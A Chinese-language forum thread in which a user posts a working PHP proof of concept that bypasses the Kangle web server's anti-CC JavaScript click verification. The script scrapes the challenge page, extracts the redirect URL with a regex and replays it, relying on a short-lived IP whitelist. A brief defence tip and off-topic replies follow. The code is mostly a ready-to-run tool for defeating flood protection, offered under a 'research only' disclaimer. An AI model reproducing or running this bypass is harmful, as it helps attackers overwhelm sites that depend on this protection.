kangle防cc JS点击验证 绕过过程 poc

tting

Kangle默认的点击验证很简单 通过正则匹配即可完全bypass 其次kangle存在ip白名单 如短时间内通过一次验证 则无需cookie也可直接访问网站内容

贴上POC

<?php

/*
Bypass BY :www.wafcloud.net/乌云盾
仅作技术研究使用，严禁用于违法用途
正则即可处理绕过默认kangle 的js点击验证
*/
$cookie_jar = tempnam(‘./tmp’,’cookie’);
function curl($cookieUrl,$url = ”, $addHeaders = [], $requestType = ‘get’, $requestData = ”, $postType = ”, $urlencode = true)
{
if (empty($url))
return ”;
//容错处理
$headers = [
‘User-Agent: Mozilla/7.0 (Windows; U; Windows NT 6.1; zh-CN; rv:2.9) Gecko/2018052906 Firefox/3.0’
// ‘Referer:’ . $url
];

if (strtolower($postType) == ‘json’ && $requestType != ‘get’) {
$headers[] = ‘Content-Type: application/json; charset=utf-8’;
$requestData = is_array($requestData) ? json_encode($requestData) : $requestData;
$headers[] = ‘Content-Length: ‘ . strlen($requestData);
}

if (!empty($addHeaders))
$headers = array_merge($headers, $addHeaders);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookieUrl);
curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_1);

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
//设置允许302转跳

// curl_setopt($ch, CURLOPT_PROXYAUTH, CURLAUTH_BASIC);
// curl_setopt($ch, CURLOPT_PROXY, ‘127.0.0.1’);
// curl_setopt($ch, CURLOPT_PROXYPORT, ‘123’);
//set proxy

curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
//add ssl
if ($requestType == ‘get’) {
curl_setopt($ch, CURLOPT_HEADER, false);
} else if ($requestType == ‘post’) {
curl_setopt($ch, CURLOPT_POST, 1);
} else {
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, strtoupper($requestType));
}
//处理类型
if ($requestType != ‘get’) {
if (is_array($requestData) && !empty($requestData)) {
$temp = ”;
foreach ($requestData as $key => $value) {
if ($urlencode) {
$temp .= rawurlencode(rawurlencode($key)) . ‘=’ . rawurlencode(rawurlencode($value)) . ‘&’;
} else {
$temp .= $key . ‘=’ . $value . ‘&’;
}
}
$requestData = substr($temp, 0, strlen($temp) – 1);
}
curl_setopt($ch, CURLOPT_POSTFIELDS, $requestData);
}

$result = curl_exec($ch);

curl_close($ch);

return $result;
}

function isSafe($html)
{
return preg_match(‘/<title>安全防护系统<\/title>/’, $html) == 1;
}

function getSafeUrl($cookie_jar,$url)
{
$data = curl($cookie_jar,$url);

if (isSafe($data)) {
preg_match(‘/location.href =(.+);/’, $data, $result);
if (count($result) == 2) {
$result = $result[1];
$result = preg_replace(‘/”|\+/’, ”, $result);
$result = preg_replace(‘/\s/’, ”, $result);
return $url . $result;
}
}
return ”;
}
echo curl($cookie_jar,getSafeUrl($cookie_jar,”https://www.wafcloud.net/”));

tting

防御方式也很简单 最起码js稍微混淆一下。

coolday

很少人用kangle了吧

tting

小奶狗 发表于 2018-12-26 22:23
小樱早就写出来了，加个注悉就很6吗

小樱是谁？

Titan

tting 发表于 2018-12-27 00:14
小樱是谁？

小樱都不认识啊，玩Kangle最溜的那个，itzmx。你是发福吗。

tting

Titan 发表于 2019-1-13 22:52
小樱都不认识啊，玩Kangle最溜的那个，itzmx。你是发福吗。

不用kangle啊。。